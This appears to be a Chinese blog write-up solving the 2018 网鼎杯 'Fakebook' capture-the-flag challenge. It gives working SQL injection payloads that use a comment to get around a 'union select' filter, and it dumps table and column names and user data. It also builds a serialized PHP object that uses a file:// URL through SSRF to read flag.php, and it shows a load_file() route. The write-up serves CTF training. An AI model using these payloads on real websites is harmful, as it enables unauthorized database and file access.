[网鼎杯 2018]Fakebook

  • 开发
  • 25

解法一

在robots.txt,可以发现/user.php.bak

下载下来是一段代码
 

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

很明显是 SSRF的 , 但还不知道要咋用

注册一个账号登录进去 , 可以发现在url上存在一个参数可以进行传参

/view.php?no=1
先随便传点东西进去

估计存在sql注入啥的, 尝试进行测试

估计就是sql注入了, 需要绕过一些过滤

union select 不行, 但是单独的union 和 select 可以, 可能是不能连一起 , 中间用 /**/
可以正常回显

在测试的时候可以发现第二个参数可以回显
当前数据库: fakebook

得到表名:users
/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+

得到列名:  no,username,passwd,data

/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'--+

得到数据 看着很糊, 但没有flag
/view.php?no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from fakebook.users--+

单独看 data 的数据
很明显的反序列化的内容 , 之前注册账号的内容
/view.php?no=-1 union/**/select 1,group_concat(data),3,4 from fakebook.users--+

这里就要跟前面得到的 代码有关了

利用SSRF的file协议读取本地文件
(前面给的序列化字符串, 猜测应该会进行一个反序列化)

<?php
class Userinfo
{
    public $name = "www";
    public $age = 15;
    public $blog = "file:///var/www/html/flag.php";
}
$data = new Userinfo();
echo serialize($data);

?no=-1 union/**/select 1,2,3,'O:8:"Userinfo":3:{s:4:"name";s:3:"www";s:3:"age";i:15;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
 

前面可以知道是data字段存放着序列化的字符串 , 所以将自己构造的序列化字符串放在第四个位置注入进去

源码里面可以找到一串特性的字符串, 点击一下, 就会跳转到相应的界面得到flag

解法二:

直接通过sql读取函数直接读取flag.php文件,借助load_file()函数

里面的参数是一个完整的路径,于是我们直接用var/www/html/flag.php路径去访问一下这个文件就可以拿的到flag

pyload:

?no=-1 union/**/select 1,load_file("/var/www/html/flag.php"),3,4--+

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-17 13:00:02       67 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-17 13:00:02       72 阅读

  9. 在Django里面运行非项目文件

    2024-07-17 13:00:02       58 阅读

  19. Python语言-面向对象

    2024-07-17 13:00:02       69 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-17 13:00:02       64 阅读

热门阅读

  3. 什么是决策树?

    2024-07-17 13:00:02       29 阅读

  4. ubuntu在代码中添加异常信号捕获防止异常退出(可用于多线程程序)

    2024-07-17 13:00:02       27 阅读

  7. android binder如何实现异步

    2024-07-17 13:00:02       17 阅读

  14. 基于STM32设计的物联网智能鱼缸(微信小程序)(187)

    2024-07-17 13:00:02       26 阅读

  15. 文件查找和文件删除

    2024-07-17 13:00:02       20 阅读

  17. axios

    2024-07-17 13:00:02       22 阅读